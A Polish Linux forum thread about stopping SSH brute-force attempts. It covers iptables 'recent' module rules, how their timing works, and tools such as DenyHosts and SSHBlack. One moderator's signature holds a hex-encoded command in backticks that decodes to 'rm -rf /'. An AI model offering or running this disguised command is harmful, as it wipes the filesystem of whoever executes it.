Bledne logowania sshd

Serwery i sieci oparte na Slackware, wszelkiego rodzaju usługi, troubleshooting.

Moderatorzy: Moderatorzy, Administratorzy

Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Bledne logowania sshd

Post autor: urbizdw »

Mam serwerek sshd patrze w logi a tam pelno atakow ktos probowal sie logowac pod roznymi loginami ;] i zastanawiam sie jak za pomoca iptablesa zrealizowac takie cos:
jesli sa 4 razy zle wprowadzone dane w czasie 1 godzinki z tego samego IP niech blokuje to IP na jeden dzien.
Chyba ze macie inne lepsze rozwiazanie ;]
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !
sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Bledne logowania sshd

Post autor: sayetan »

Na forum juz jest takie rozwiazanie i to od dawna, funkcja szukaj nie gryzie.
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
Awatar użytkownika
myuser
Użytkownik
Posty: 442
Rejestracja: 2006-02-09, 17:44
Lokalizacja: Warszawa
Kontakt:

Re: Bledne logowania sshd

Post autor: myuser »

DenyHosts project...
b4rtek
Użytkownik
Posty: 15
Rejestracja: 2006-10-11, 10:42

Re: Bledne logowania sshd

Post autor: b4rtek »

Blocksshd project... polecam, fajny skrypcik w perl-u.
Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Bledne logowania sshd

Post autor: Radek_R »

SSHBlack - jeszcze fajniejszy skrypt w perlu.
#358274
http://www.prook.net
Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek »

albo 2 linijki w iptables :twisted:

jak mowil Sayetan use the search... hint "recent" and force be with You.

Sam to wprowadzilem, jak po jednej nocy (10 godzin ataku) przybylo mi jakies 800tys linii w logu ssh :twisted:
Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Re: Bledne logowania sshd

Post autor: urbizdw »

Kto mi podal taki skrypt:

Kod: Zaznacz cały

iptables -N SSH_CHECK
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_CHECK
iptables -A SSH_CHECK -m recent --set --name SSH
iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP
I srednio to rozumie na jaki czas blokuje ten skrypt dane IP bo chcialme ustawie ze na 1 godzinke tylko nie wiem gdzie ;]
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !
Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek »

urbizdw pisze:Kto mi podal taki skrypt:

Kod: Zaznacz cały

iptables -N SSH_CHECK
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_CHECK
iptables -A SSH_CHECK -m recent --set --name SSH
iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP
I srednio to rozumie na jaki czas blokuje ten skrypt dane IP bo chcialme ustawie ze na 1 godzinke tylko nie wiem gdzie ;]
Wiesz... podstawowa jednostka ukladu SI jest sekunda...

czytac umiesz, wiec chyba dasz rade... hint "seconds 3600" -> 4 nowe polaczenia z jednego adresu w ciagu godziny... a przepraszam... 3, bo najpierw jest incrementowane, pozniej sprawdzane. Btw. ja bym to zrobil w 2 regolach, ale jak kto woli.

BTW. To nie skrypt, a regoly firewalla, do miana skryptu to jeszcze czegos brakuje ;)
Ostatnio zmieniony 2007-02-21, 15:34 przez Pajaczek, łącznie zmieniany 1 raz.
Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Re: Bledne logowania sshd

Post autor: urbizdw »

Pajaczek mozesz podac te dwie linijki jak Ty bys to napisal ;]?
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !
Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek »

urbizdw pisze:Pajaczek mozesz podac te dwie linijki jak Ty bys to napisal ;]?
Dokladnie tak samo, tylko bez dodatkowego lancucha... ma to swoje zalety i wady. Zaleta jest mniej mieszania, i o 1 lancuch krotsza pordoz pakietu dla ssh. Wada o 1 lancuch dluzsze sprawdzanie dla pozostalych pakietow.

Kod: Zaznacz cały

iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH 
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP
Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Bledne logowania sshd

Post autor: Radek_R »

Ale te wasze regułki z tego co widzę ograniczają jedynie ilość nowych połączeń z danego hosta (IP) w danym przedziale czasu, a nie robią tego co z założenia miały robić (blokować po pewnej ilości nieudanych logowań w danym obrębie czasu).
#358274
http://www.prook.net
Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek »

Radek_R pisze:Ale te wasze regułki z tego co widzę ograniczają jedynie ilość nowych połączeń z danego hosta (IP) w danym przedziale czasu, a nie robią tego co z założenia miały robić (blokować po pewnej ilości nieudanych logowań w danym obrębie czasu).
Ale w polacznieu z limitem nieudanych logowan (w ssh.conf), sprawdza sie to dobrze... pozatym te klasyczne atakery, z tego co zauwazylem, stosuja zasade 1 polaczenie - 1 proba. W kazdym badz razie u mnie nie pojawiaja sie bloki wiecej niz 3 fake loginow (bo tez ustawilem u siebie na 3).

Ach... jeszcze jedno, faktycznie ta godzina moze troche zatruc zycie nawet "poprawnym" userom. Trzeba to jakos wyposrodkowac. Atakery w kazdym badz razie odpuszczaja po kilku min. jak nie moga sie polaczyc.
Ostatnio zmieniony 2007-02-22, 11:05 przez Pajaczek, łącznie zmieniany 2 razy.
Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Bledne logowania sshd

Post autor: Radek_R »

Pajaczek pisze:Ach... jeszcze jedno, faktycznie ta godzina moze troche zatruc zycie nawet "poprawnym" userom.
U siebie mam ustawione 6 nieudanych logowań wciągu 10 minut. Takich namolnych ludków blokuję na stałe (a nie jak chciał urbizdw na jeden dzień).
#358274
http://www.prook.net
Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Re: Bledne logowania sshd

Post autor: urbizdw »

Radek_R a nie uwazasz ze troche bezsensu jak blokuje na stale bo np ktos jest w jakiejs wiekszej sieci i zawsze znajdzie sie jaki duren co bedzie probowac sie zalogowac a jakis pozadny user bedzie chcial sie zalogowac i kiszka bo zblokujemy IP calej sieci ? wiec nie lepiej na jeden dzien? A jesli cos mzoesz mi podac roziwazanie?? Regulki w iptablesie?
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !
Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek »

urbizdw pisze: A jesli cos mzoesz mi podac roziwazanie?? Regulki w iptablesie?
No przeciez Ci podal... 5 post.
ODPOWIEDZ